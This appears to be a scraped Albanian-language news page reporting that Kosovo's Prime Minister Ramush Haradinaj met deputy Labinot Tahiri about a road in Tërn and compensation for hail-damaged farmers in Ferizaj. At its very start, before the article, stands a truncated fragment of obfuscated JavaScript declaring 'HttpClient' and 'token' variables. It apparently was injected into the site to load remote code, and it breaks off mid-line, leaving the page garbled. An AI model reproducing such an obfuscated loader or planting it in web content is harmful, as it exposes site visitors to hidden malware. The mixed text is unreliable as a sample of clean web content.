;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kryeministri falënderon Labin për adresimin e problemeve të qytetarëve

By

Kryeministri i Kosovës, Ramush Haradinaj, ka pritur sot në një takim deputetin e Kuvendit të Kosovës, Labinot Tahirin, me të cilin kanë diskutuar për rrjedhat politike në vend.

Nëpërmjet një postimi në Facebook, Haradinaj ka falënderuar deputetin Tahiri, për angazhimin e tij për adresimin e problemeve të qytetarëve.

“Prita në takim deputetin e Kuvendit të Kosovës, Labinot Tahiri me të cilin diskutuam për rrjedhat politike në vend. Deputeti Tahiri shprehu falënderimin e tij ndaj Qeverisë së Kosovës për fillimin e punimeve në rrugën për fshatin Tërn në Ferizaj dhe po ashtu diskutuam edhe për statusin e kompenzimit të fermerëve të Komunës së Ferizajt për dëmet që u shkaktuan nga breshëri. Z. Tahiri e falënderova për angazhimin e tij që t’i adresojë problemet e qytetarëve të kësaj komune në mënyrë që Qeveria e Kosovës të jetë sa më afër shqetësimeve të tyre për t’iu dhënë zgjidhje”, ka shkruar Haradinaj në Facebook.

Artikuj të ngjashëm